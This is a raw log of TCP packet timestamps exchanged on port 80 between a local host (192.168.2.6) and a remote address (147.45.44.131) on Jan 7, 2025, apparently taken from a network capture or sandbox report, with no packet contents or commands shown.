                                                                          Jan 7, 2025 06:12:06.799653053 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799663067 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799671888 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799674034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799685955 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799694061 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799695969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799707890 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799722910 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799727917 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799743891 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799745083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799757004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799772024 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799779892 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799782991 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799793959 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799801111 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799804926 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799815893 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799827099 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799849033 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799868107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799879074 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799887896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799897909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799909115 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799920082 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799923897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799936056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799947977 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799962997 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.799976110 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799988031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.799998045 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800008059 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800009012 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800026894 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800090075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800100088 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800110102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800122976 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800124884 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800134897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800144911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800148010 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800157070 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800172091 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800204992 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800204992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800216913 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800226927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800235033 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800247908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800250053 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800263882 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800266981 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800277948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800297022 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800329924 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800340891 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800352097 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800363064 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800368071 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800399065 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800416946 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800427914 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800438881 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800447941 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800467968 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800478935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800478935 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800489902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800508976 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800594091 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800605059 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800610065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800623894 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800632000 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800633907 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800645113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800654888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800662994 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800671101 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800688982 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800728083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800745964 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800755978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800764084 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800781012 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800791979 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800800085 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800802946 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800828934 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800884008 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800899029 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800909042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800918102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800925016 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800934076 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800945997 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800956011 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800956011 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800967932 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800975084 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.800977945 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.800993919 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.801007986 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.852581978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.852618933 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.852629900 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.852639914 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.852650881 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.852665901 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.852677107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.852690935 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.852737904 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891305923 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891350985 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891367912 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891379118 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891388893 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891391039 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891406059 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891416073 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891421080 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891427040 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891427040 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891433001 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891438961 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891463995 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891474962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891479969 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891505003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891505003 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891515970 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891525984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891555071 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891611099 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891621113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891630888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891640902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891644955 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891659021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891661882 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891669989 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891675949 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891684055 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891695976 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891702890 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891706944 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891717911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891726971 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891747952 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891774893 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891786098 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891796112 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891805887 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891823053 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891844034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891845942 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891855955 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891866922 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891887903 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891906023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891916990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891927958 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891937971 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891961098 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.891983032 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.891993046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892004013 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892014980 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892024994 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892040968 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892184019 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892200947 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892210960 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892220974 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892230034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892234087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892235994 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892239094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892251015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892267942 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892271996 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892278910 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892290115 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892301083 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892307997 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892319918 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892323971 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892335892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892342091 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892345905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892359018 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892365932 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892369986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892406940 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892410040 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892421007 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892431021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892440081 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892442942 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892458916 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892460108 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892468929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892479897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892499924 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892502069 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892512083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892519951 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892523050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892546892 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892597914 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892607927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892618895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892628908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892633915 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892640114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892647028 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892652035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892678022 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892724037 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892741919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892752886 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892762899 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892771959 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892775059 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892784119 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892788887 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892802954 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892818928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892828941 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892836094 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892839909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892851114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892860889 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892860889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892874956 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892903090 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.892988920 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.892998934 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893008947 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893018961 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893027067 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893029928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893040895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893048048 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893053055 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893085003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893085957 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893096924 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893106937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893111944 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893115997 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893124104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893135071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893140078 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893143892 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893151999 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893162966 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893172026 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893189907 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893222094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893233061 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893239021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893251896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893263102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893265009 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893274069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893287897 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893312931 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893399000 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893409967 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893419027 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893429995 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.893439054 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.893455982 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.944914103 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.944926023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.944943905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.944953918 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.944958925 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.944969893 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.944981098 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.944982052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.945003986 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.945022106 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.945059061 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.983679056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983691931 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983705044 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983715057 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983731985 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983742952 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983757019 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.983757973 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983781099 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983792067 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983798027 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.983805895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983817101 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.983817101 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983829975 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983840942 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983851910 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.983870983 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983877897 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.983881950 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983892918 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983902931 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.983903885 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.983928919 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984086037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984098911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984114885 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984119892 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984129906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984143019 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984150887 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984153032 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984170914 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984173059 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984184027 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984194994 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984205008 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984210014 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984216928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984224081 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984227896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984237909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984256983 CET8049712147.45.44.131192.168.2.6
